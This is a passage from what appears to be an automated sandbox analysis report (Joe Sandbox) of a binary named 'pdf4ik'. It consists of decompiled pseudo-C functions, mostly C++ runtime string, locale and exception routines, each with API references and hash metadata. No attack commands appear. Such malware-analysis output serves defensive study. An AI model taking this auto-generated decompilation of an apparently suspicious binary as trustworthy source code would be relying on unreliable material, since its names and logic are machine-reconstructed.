                                        						if( *((intOrPtr*)(_t52 + 0x10)) + _t28 <= _t33) {
                                        							goto L12;
                                        						} else {
                                        							if(_t38 < 0x10) {
                                        								return E29D894C0(_t52, _t52, _t33 - _t52, _a8);
                                        							} else {
                                        								return E29D894C0(_t52, _t52, _t33 -  *_t52, _a8);
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}













                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89335
                                        • _memmove.LIBCMT ref: 29D89386
                                          • Part of subcall function 29D894C0: std::_Xinvalid_argument.LIBCPMT ref: 29D894DA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                        • String ID: string too long
                                        • API String ID: 2168136238-2556327735
                                        • Opcode ID: 4c16fbf3884959d19bc1cfb1224ad00c706f4b451073f32c6406b1ad871f46e4
                                        • Instruction ID: 1f42ae3f307a83693896b49c2630921dd4bddaee28b7096fcaf2d76b3e593362
                                        • Opcode Fuzzy Hash: 4c16fbf3884959d19bc1cfb1224ad00c706f4b451073f32c6406b1ad871f46e4
                                        • Instruction Fuzzy Hash: 6931A4323106149FD3249EDCE88495EF7EDFFA5664B60462FE5C6C7A82C761E84393A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E29D95660(signed int _a4, intOrPtr* _a8, intOrPtr _a12) {
                                        				char _v8;
                                        				char _v16;
                                        				intOrPtr _v20;
                                        				void* __ecx;
                                        				void* __edi;
                                        				signed int _t35;
                                        				void* _t39;
                                        				intOrPtr* _t40;
                                        				signed int _t41;
                                        				signed int _t42;
                                        				signed int _t53;
                                        				char _t56;
                                        				signed int _t57;
                                        				signed int _t64;
                                        				signed int _t66;
                                        				signed int _t68;
                                        				signed int _t70;
                                        				intOrPtr _t71;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC2260);
                                        				_push( *[fs:0x0]);
                                        				_push(_t57);
                                        				_t35 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t35 ^ _t70);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v20 = _t71;
                                        				_t68 = _a4;
                                        				_t39 = _a12 - _a8;
                                        				_t64 =  *(_t68 + 0x10);
                                        				if(_t64 <= _t39 &&  *(_t68 + 0x14) != _t39) {
                                        					_t57 = _t68;
                                        					if(E29D895B0(_t57, _t64, _t39, 1) != 0) {
                                        						 *(_t68 + 0x10) = _t64;
                                        						if( *(_t68 + 0x14) < 0x10) {
                                        							_t53 = _t68;
                                        						} else {
                                        							_t53 =  *_t68;
                                        						}
                                        						 *((char*)(_t53 + _t64)) = 0;
                                        					}
                                        				}
                                        				_v8 = 0;
                                        				_t40 = _a8;
                                        				while(_t40 != _a12) {
                                        					_t56 =  *_t40;
                                        					_t41 =  *(_t68 + 0x10);
                                        					if((_t57 | 0xffffffff) - _t41 <= 1) {
                                        						_t41 = E29DAD440("string too long");
                                        					}
                                        					_t15 = _t41 + 1; // 0x1
                                        					_t66 = _t15;
                                        					if(_t66 > 0xfffffffe) {
                                        						_t41 = E29DAD440("string too long");
                                        					}
                                        					_t57 =  *(_t68 + 0x14);
                                        					if(_t57 >= _t66) {
                                        						if(_t66 != 0) {
                                        							goto L15;
                                        						}
                                        						 *(_t68 + 0x10) = _t66;
                                        						if(_t57 < 0x10) {
                                        							 *_t68 = 0;
                                        							_t40 = _a8 + 1;
                                        							_a8 = _t40;
                                        						} else {
                                        							 *( *_t68) = 0;
                                        							_t40 = _a8 + 1;
                                        							_a8 = _t40;
                                        						}
                                        						continue;
                                        					} else {
                                        						_t57 = _t68;
                                        						E29D89750(_t57, _t66, _t41);
                                        						if(_t66 == 0) {
                                        							L25:
                                        							_t40 = _a8 + 1;
                                        							_a8 = _t40;
                                        							continue;
                                        						}
                                        						L15:
                                        						_t57 =  *(_t68 + 0x10);
                                        						if( *(_t68 + 0x14) < 0x10) {
                                        							_t42 = _t68;
                                        						} else {
                                        							_t42 =  *_t68;
                                        						}
                                        						 *((char*)(_t42 + _t57)) = _t56;
                                        						 *(_t68 + 0x10) = _t66;
                                        						if( *(_t68 + 0x14) < 0x10) {
                                        							 *((char*)(_t68 + _t66)) = 0;
                                        							goto L25;
                                        						} else {
                                        							 *((char*)( *_t68 + _t66)) = 0;
                                        							_t40 = _a8 + 1;
                                        							_a8 = _t40;
                                        							continue;
                                        						}
                                        					}
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				return _t40;
                                        			}

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D956ED
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D956FF
                                          • Part of subcall function 29D895B0: std::_Xinvalid_argument.LIBCPMT ref: 29D895C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_
                                        • String ID: string too long
                                        • API String ID: 909987262-2556327735
                                        • Opcode ID: c7a2c5184312fd5aaabadd37fc987ceead0ad253f504847705b504bb6948cbcc
                                        • Instruction ID: adebe816fdd2d334e1c4cc9f37ff51f8172b43ef50a6c01acfe08edd209a10ad
                                        • Opcode Fuzzy Hash: c7a2c5184312fd5aaabadd37fc987ceead0ad253f504847705b504bb6948cbcc
                                        • Instruction Fuzzy Hash: 2641C334614644DFD725DF18C880B5AB7F9FF55760F108A6DEC968BB40DB70AA02DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 70%
                                        			E29DA80E0(char __edx, intOrPtr _a4) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr* _v24;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t20;
                                        				char* _t26;
                                        				char* _t28;
                                        				char* _t30;
                                        				void* _t35;
                                        				void* _t38;
                                        				void* _t39;
                                        				void* _t40;
                                        				char* _t42;
                                        				char* _t43;
                                        				char* _t44;
                                        				void* _t51;
                                        				intOrPtr* _t52;
                                        				intOrPtr* _t53;
                                        				char* _t54;
                                        				intOrPtr* _t55;
                                        				intOrPtr _t58;
                                        				signed int _t60;
                                        				void* _t61;
                                        				void* _t66;
                                        
                                        				_t48 = __edx;
                                        				_push(0xffffffff);
                                        				_push(E29DC1B90);
                                        				_push( *[fs:0x0]);
                                        				_push(_t51);
                                        				_t20 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t20 ^ _t60);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v20 = _t61 - 8;
                                        				_t58 = _a4;
                                        				_v24 = E29DAFCBE(_t51, _t58, _t66);
                                        				 *((intOrPtr*)(_t58 + 8)) = 0;
                                        				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                        				 *((intOrPtr*)(_t58 + 0x14)) = 0;
                                        				_v8 = 0;
                                        				_t52 = 0x29dcd617;
                                        				E29DADE30();
                                        				_t38 = 1;
                                        				_t26 = E29DAD4FB(1, _t48, 0x29dcd617, _t58, 0, 1);
                                        				_t42 = _t26;
                                        				while(_t38 != 0) {
                                        					_t48 =  *_t52;
                                        					 *_t42 =  *_t52;
                                        					_t38 = _t38 - 1;
                                        					_t42 = _t42 + 1;
                                        					_t52 = _t52 + 1;
                                        				}
                                        				 *((intOrPtr*)(_t58 + 8)) = _t26;
                                        				E29DADE30();
                                        				_t39 = 6;
                                        				_t53 = "false";
                                        				_t28 = E29DAD4FB(6, _t48, _t53, _t58, __eflags, 6);
                                        				_t43 = _t28;
                                        				while(1) {
                                        					__eflags = _t39;
                                        					if(__eflags == 0) {
                                        						break;
                                        					}
                                        					_t48 =  *_t53;
                                        					 *_t43 =  *_t53;
                                        					_t39 = _t39 - 1;
                                        					_t43 = _t43 + 1;
                                        					_t53 = _t53 + 1;
                                        				}
                                        				 *((intOrPtr*)(_t58 + 0x10)) = _t28;
                                        				E29DADE30();
                                        				_t40 = 5;
                                        				_t54 = "true";
                                        				_t30 = E29DAD4FB(5, _t48, _t54, _t58, __eflags, 5);
                                        				_t44 = _t30;
                                        				while(1) {
                                        					__eflags = _t40;
                                        					if(_t40 == 0) {
                                        						break;
                                        					}
                                        					 *_t44 =  *_t54;
                                        					_t40 = _t40 - 1;
                                        					_t44 = _t44 + 1;
                                        					_t54 =  &(_t54[1]);
                                        				}
                                        				 *((intOrPtr*)(_t58 + 0x14)) = _t30;
                                        				E29DADE30();
                                        				_t55 = _v24;
                                        				 *((char*)(_t58 + 0xc)) =  *((intOrPtr*)( *_t55));
                                        				E29DADE30();
                                        				 *((char*)(_t58 + 0xd)) =  *((intOrPtr*)( *((intOrPtr*)(_t55 + 4))));
                                        				_t35 = 1;
                                        				__eflags = 1;
                                        				if(1 != 0) {
                                        					E29DADE30();
                                        					 *((char*)(_t58 + 0xc)) = 0x2e;
                                        					_t35 = E29DADE30();
                                        					 *((char*)(_t58 + 0xd)) = 0x2c;
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				return _t35;
                                        			}

                                        APIs
                                        • _localeconv.LIBCMT ref: 29DA810E
                                          • Part of subcall function 29DAFCBE: __getptd.LIBCMT ref: 29DAFCBE
                                          • Part of subcall function 29DADE30: ____lc_handle_func.LIBCMT ref: 29DADE33
                                          • Part of subcall function 29DADE30: ____lc_codepage_func.LIBCMT ref: 29DADE3B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ____lc_codepage_func____lc_handle_func__getptd_localeconv
                                        • String ID: false$true
                                        • API String ID: 679402580-2658103896
                                        • Opcode ID: 48cca7bda926c1f58a0247c360ef73e305d8619a6269581f49a0bcbe95692f09
                                        • Instruction ID: 0581e302e2363b8373f3d2203ef7861d220336006459016614751166db65c8f0
                                        • Opcode Fuzzy Hash: 48cca7bda926c1f58a0247c360ef73e305d8619a6269581f49a0bcbe95692f09
                                        • Instruction Fuzzy Hash: 713122B19447809FC711CF748480767BBE9EF3A280F14997DC9968BB01EA34A6179BF1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _malloc.LIBCMT ref: 29DA5020
                                        • StrCmpCW.SHLWAPI(00000000,image/jpeg), ref: 29DA504A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _malloc
                                        • String ID: image/jpeg
                                        • API String ID: 1579825452-3785015651
                                        • Opcode ID: 565427cab4eedab358a7806150547dcb6c60dfad971382295179cdf08c8687eb
                                        • Instruction ID: 286dbc9227377c1c1e1ea2f609b59e4ec4ec0e82f5d15b7d04e725495c5bee84
                                        • Opcode Fuzzy Hash: 565427cab4eedab358a7806150547dcb6c60dfad971382295179cdf08c8687eb
                                        • Instruction Fuzzy Hash: 30118472A01118AB8710DF9CD98489EBBB9EF89760720C29BE80CDB241D731DA52DBD5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D97940(intOrPtr* __edi, intOrPtr* _a4, signed int _a8) {
                                        				void* __esi;
                                        				signed int _t16;
                                        				intOrPtr* _t21;
                                        				signed int _t31;
                                        				void* _t32;
                                        				intOrPtr* _t33;
                                        				intOrPtr* _t34;
                                        				intOrPtr* _t41;
                                        				intOrPtr _t42;
                                        				signed int _t43;
                                        
                                        				_t41 = __edi;
                                        				_t33 = _a4;
                                        				_t31 = _a8;
                                        				_t42 =  *((intOrPtr*)(_t33 + 0x10));
                                        				if(_t42 < _t31) {
                                        					_t16 = E29DAD48D("invalid string position");
                                        				}
                                        				_t43 = _t42 - _t31;
                                        				if(_t16 < _t43) {
                                        					_t43 = _t16;
                                        				}
                                        				if(_t41 != _t33) {
                                        					if(E29D97A70(_t43) == 0) {
                                        						L15:
                                        						return _t41;
                                        					} else {
                                        						_t34 = _a4;
                                        						if( *((intOrPtr*)(_t34 + 0x14)) >= 8) {
                                        							_t34 =  *_t34;
                                        						}
                                        						if( *((intOrPtr*)(_t41 + 0x14)) < 8) {
                                        							_t21 = _t41;
                                        						} else {
                                        							_t21 =  *_t41;
                                        						}
                                        						_t32 = _t43 + _t43;
                                        						E29DB0010(_t21, _t34 + _a8 * 2, _t32);
                                        						 *(_t41 + 0x10) = _t43;
                                        						if( *((intOrPtr*)(_t41 + 0x14)) < 8) {
                                        							 *((short*)(_t32 + _t41)) = 0;
                                        							goto L15;
                                        						} else {
                                        							 *((short*)(_t32 +  *_t41)) = 0;
                                        							return _t41;
                                        						}
                                        					}
                                        				} else {
                                        					E29D979F0(_t16 | 0xffffffff, _t43 + _t31, _t41);
                                        					E29D979F0(_t31, 0, _t41);
                                        					return _t41;
                                        				}
                                        			}

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D97957
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                          • Part of subcall function 29D97A70: std::_Xinvalid_argument.LIBCPMT ref: 29D97A7D
                                        • _memmove.LIBCMT ref: 29D979B7
                                        Strings
                                        • invalid string position, xrefs: 29D97952
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                        • String ID: invalid string position
                                        • API String ID: 3404309857-1799206989
                                        • Opcode ID: 95d9bcc4f99873c4d6a29a667f2b6f5ffbd599843b5ab1ab135c99e66b3c1a34
                                        • Instruction ID: 90835c10c62302ea70604797040317e1ac60d78d9af2dc7d1e0b561949b1c12e
                                        • Opcode Fuzzy Hash: 95d9bcc4f99873c4d6a29a667f2b6f5ffbd599843b5ab1ab135c99e66b3c1a34
                                        • Instruction Fuzzy Hash: 3E112932731211ABD704EF6CE8808A9B36AFFD42247504A2FE449DBA41D731ED56D7B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D896C0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                        				intOrPtr _t10;
                                        				intOrPtr _t11;
                                        				intOrPtr _t16;
                                        				intOrPtr* _t19;
                                        				intOrPtr _t24;
                                        				intOrPtr _t27;
                                        				intOrPtr* _t28;
                                        				intOrPtr _t31;
                                        				intOrPtr* _t34;
                                        
                                        				_t34 = __ecx;
                                        				_t10 =  *((intOrPtr*)(__ecx + 0x10));
                                        				_t24 = _a4;
                                        				if(_t10 < _t24) {
                                        					_t10 = E29DAD48D("invalid string position");
                                        				}
                                        				_t31 = _a8;
                                        				_t11 = _t10 - _t24;
                                        				if(_t11 < _t31) {
                                        					_t31 = _t11;
                                        				}
                                        				if(_t31 == 0) {
                                        					L14:
                                        					return _t34;
                                        				} else {
                                        					_t27 =  *((intOrPtr*)(_t34 + 0x14));
                                        					if(_t27 < 0x10) {
                                        						_t19 = _t34;
                                        					} else {
                                        						_t19 =  *_t34;
                                        					}
                                        					if(_t27 < 0x10) {
                                        						_t28 = _t34;
                                        					} else {
                                        						_t28 =  *_t34;
                                        					}
                                        					E29DAE1F0(_t28 + _t24, _t19 + _t24 + _t31, _t11 - _t31);
                                        					_t16 =  *((intOrPtr*)(_t34 + 0x10)) - _t31;
                                        					 *((intOrPtr*)(_t34 + 0x10)) = _t16;
                                        					if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
                                        						 *((char*)(_t34 + _t16)) = 0;
                                        						goto L14;
                                        					} else {
                                        						 *((char*)( *_t34 + _t16)) = 0;
                                        						return _t34;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D896D6
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                        • _memmove.LIBCMT ref: 29D8970F
                                        Strings
                                        • invalid string position, xrefs: 29D896D1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                        • String ID: invalid string position
                                        • API String ID: 1785806476-1799206989
                                        • Opcode ID: 4c4b6232c3be97f65a646c7bdd41f99ad805dee30e9211ef8ee61f56fd2ebbad
                                        • Instruction ID: e0e7784fdba8dc570704990c5d3529030129aa6a70bf8490d907b445f9ab669f
                                        • Opcode Fuzzy Hash: 4c4b6232c3be97f65a646c7bdd41f99ad805dee30e9211ef8ee61f56fd2ebbad
                                        • Instruction Fuzzy Hash: 5501F9763102505BC3258E6CEC8595AB3EAFFD0690B24492ED1C1CBF06D6B1EC43E3A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DA08E0(signed int __eax, char __ebx, intOrPtr* __esi) {
                                        				intOrPtr _t15;
                                        				intOrPtr* _t16;
                                        				char* _t21;
                                        				char _t27;
                                        				intOrPtr _t28;
                                        				intOrPtr _t29;
                                        				signed int _t33;
                                        				intOrPtr* _t38;
                                        
                                        				_t38 = __esi;
                                        				_t27 = __ebx;
                                        				_t28 =  *((intOrPtr*)(__esi + 0x10));
                                        				if((__eax | 0xffffffff) - _t28 <= 1) {
                                        					E29DAD440("string too long");
                                        				}
                                        				_t33 = _t28 + 1;
                                        				if(_t33 > 0xfffffffe) {
                                        					E29DAD440("string too long");
                                        				}
                                        				_t15 =  *((intOrPtr*)(_t38 + 0x14));
                                        				if(_t15 >= _t33) {
                                        					if(_t33 != 0) {
                                        						goto L6;
                                        					} else {
                                        						 *((intOrPtr*)(_t38 + 0x10)) = _t33;
                                        						if(_t15 < 0x10) {
                                        							_t21 = _t38;
                                        							 *_t21 = 0;
                                        							return _t21;
                                        						} else {
                                        							 *((char*)( *_t38)) = 0;
                                        							return _t38;
                                        						}
                                        					}
                                        				} else {
                                        					E29D89750(_t38, _t33, _t28);
                                        					if(_t33 == 0) {
                                        						L16:
                                        						return _t38;
                                        					} else {
                                        						L6:
                                        						_t29 =  *((intOrPtr*)(_t38 + 0x10));
                                        						if( *((intOrPtr*)(_t38 + 0x14)) < 0x10) {
                                        							_t16 = _t38;
                                        						} else {
                                        							_t16 =  *_t38;
                                        						}
                                        						 *((char*)(_t16 + _t29)) = _t27;
                                        						 *((intOrPtr*)(_t38 + 0x10)) = _t33;
                                        						if( *((intOrPtr*)(_t38 + 0x14)) < 0x10) {
                                        							 *((char*)(_t38 + _t33)) = 0;
                                        							goto L16;
                                        						} else {
                                        							 *((char*)( *_t38 + _t33)) = 0;
                                        							return _t38;
                                        						}
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA08F2
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA0905
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                        • String ID: string too long
                                        • API String ID: 963545896-2556327735
                                        • Opcode ID: f4254de567d461dfb0b7747302c1ef447a79fc8d1e941fbeddc265fc4afdbfaf
                                        • Instruction ID: 6bac4dbd9fb498444ab1584f00ab6fd2aebd272bd69d451cb78b945571e0feab
                                        • Opcode Fuzzy Hash: f4254de567d461dfb0b7747302c1ef447a79fc8d1e941fbeddc265fc4afdbfaf
                                        • Instruction Fuzzy Hash: E81152313146408BE3258F2DE840609B7E1AFDA720F980B6DE0D597A95CB71E857E7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D979F0(void* __eax, signed int __ecx, intOrPtr* __esi) {
                                        				intOrPtr _t16;
                                        				void* _t17;
                                        				signed int _t25;
                                        				intOrPtr* _t28;
                                        				signed int _t30;
                                        				intOrPtr _t34;
                                        				intOrPtr* _t35;
                                        				void* _t38;
                                        				intOrPtr* _t39;
                                        
                                        				_t39 = __esi;
                                        				_t30 = __ecx;
                                        				_t38 = __eax;
                                        				_t16 =  *((intOrPtr*)(__esi + 0x10));
                                        				if(_t16 < __ecx) {
                                        					_t16 = E29DAD48D("invalid string position");
                                        				}
                                        				_t17 = _t16 - _t30;
                                        				if(_t17 < _t38) {
                                        					_t38 = _t17;
                                        				}
                                        				if(_t38 == 0) {
                                        					L14:
                                        					return _t39;
                                        				} else {
                                        					_t34 =  *((intOrPtr*)(_t39 + 0x14));
                                        					if(_t34 < 8) {
                                        						_t28 = _t39;
                                        					} else {
                                        						_t28 =  *_t39;
                                        					}
                                        					if(_t34 < 8) {
                                        						_t35 = _t39;
                                        					} else {
                                        						_t35 =  *_t39;
                                        					}
                                        					E29DAE1F0(_t35 + _t30 * 2, _t28 + (_t30 + _t38) * 2, _t17 - _t38 + _t17 - _t38);
                                        					_t25 =  *(_t39 + 0x10) - _t38;
                                        					 *(_t39 + 0x10) = _t25;
                                        					if( *((intOrPtr*)(_t39 + 0x14)) < 8) {
                                        						 *((short*)(_t39 + _t25 * 2)) = 0;
                                        						goto L14;
                                        					} else {
                                        						 *((short*)( *_t39 + _t25 * 2)) = 0;
                                        						return _t39;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D979FF
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                        • _memmove.LIBCMT ref: 29D97A3A
                                        Strings
                                        • invalid string position, xrefs: 29D979FA
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                        • String ID: invalid string position
                                        • API String ID: 1785806476-1799206989
                                        • Opcode ID: b800cdf8ff36ebdaa1379817823cd6570c7a28e39c67dac27fe375c1a367fba2
                                        • Instruction ID: 233a81e0f98693325a32a997457170788c665dac0320ec2798d0d2e39de98edd
                                        • Opcode Fuzzy Hash: b800cdf8ff36ebdaa1379817823cd6570c7a28e39c67dac27fe375c1a367fba2
                                        • Instruction Fuzzy Hash: 24019E313206118BD321DF3CEC8081AB3E6BFC46443205E2DD18AE7E19EB30EA179790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E29DB24F3(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                        				intOrPtr _t17;
                                        				intOrPtr* _t28;
                                        				void* _t29;
                                        
                                        				_t28 = __esi;
                                        				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                        				E29DB06A3(__edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                                        				 *((intOrPtr*)(E29DB524B(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                        				_t17 = E29DB524B(__ebx, __edx, __eflags);
                                        				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                        				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                                        					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                        					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                        						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                                        							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                                        							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                                        								_t17 = E29DB067C(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                                        								_t38 = _t17;
                                        								if(_t17 != 0) {
                                        									_push( *((intOrPtr*)(_t29 + 0x10)));
                                        									_push(_t28);
                                        									return E29DB227A(_t38);
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return _t17;
                                        			}

                                        APIs
                                          • Part of subcall function 29DB06A3: __getptd.LIBCMT ref: 29DB06A9
                                          • Part of subcall function 29DB06A3: __getptd.LIBCMT ref: 29DB06B9
                                        • __getptd.LIBCMT ref: 29DB2502
                                          • Part of subcall function 29DB524B: __getptd_noexit.LIBCMT ref: 29DB524E
                                          • Part of subcall function 29DB524B: __amsg_exit.LIBCMT ref: 29DB525B
                                        • __getptd.LIBCMT ref: 29DB2510
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: csm
                                        • API String ID: 803148776-1018135373
                                        • Opcode ID: 78d30a92102415e2b3a649192633f7c4b97c0873314cca7602c9d865b31b545e
                                        • Instruction ID: cb6055343e08d5265285050348f863452ae0ee8202429972f4364fa38fe0fe2e
                                        • Opcode Fuzzy Hash: 78d30a92102415e2b3a649192633f7c4b97c0873314cca7602c9d865b31b545e
                                        • Instruction Fuzzy Hash: C7014B768013059ACF29CF60C47479EB7F5BF34211F90982ED6839EA61CB309686EB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E29D89660(signed int __ecx, void* __edi, void* __esi) {
                                        				char _v8;
                                        				char _v20;
                                        				void* _t6;
                                        				void* _t14;
                                        				void* _t18;
                                        
                                        				_t6 = 0;
                                        				if(__ecx != 0) {
                                        					_t25 = __ecx - 0x3c3c3c3;
                                        					if(__ecx > 0x3c3c3c3) {
                                        						L3:
                                        						_v8 = 0;
                                        						E29DAE0FC( &_v20,  &_v8);
                                        						_v20 = 0x29dc52ac;
                                        						return E29DAFF06( &_v20, 0x29dd2028);
                                        					}
                                        					_t6 = E29DAE70E(_t14, _t18, __edi, __esi, _t25, (__ecx << 4) + __ecx + (__ecx << 4) + __ecx + (__ecx << 4) + __ecx + (__ecx << 4) + __ecx);
                                        					if(0 == 0) {
                                        						goto L3;
                                        					}
                                        				}
                                        				return _t6;
                                        			}

                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29D8969A
                                        • __CxxThrowException@8.LIBCMT ref: 29D896AF
                                          • Part of subcall function 29DAE70E: _malloc.LIBCMT ref: 29DAE728
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw_mallocstd::exception::exception
                                        • String ID: )
                                        • API String ID: 4063778783-2427484129
                                        • Opcode ID: 3cc6b942f3775f8b857029ccb7a422d825115a31ff9cc6d0eefedfc8c3d67682
                                        • Instruction ID: a497030af127ed2ff3a175f153c381f626c18be1f5e3cab586a9be72e61b60d3
                                        • Opcode Fuzzy Hash: 3cc6b942f3775f8b857029ccb7a422d825115a31ff9cc6d0eefedfc8c3d67682
                                        • Instruction Fuzzy Hash: 4FF0A0F690010A66EB08E6A4CD46ABEB264AF20140F00457CD951E2A01FA34D61BA1A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E29DA22E0(signed int __ecx, void* __edi, void* __esi) {
                                        				char _v8;
                                        				char _v20;
                                        				void* _t7;
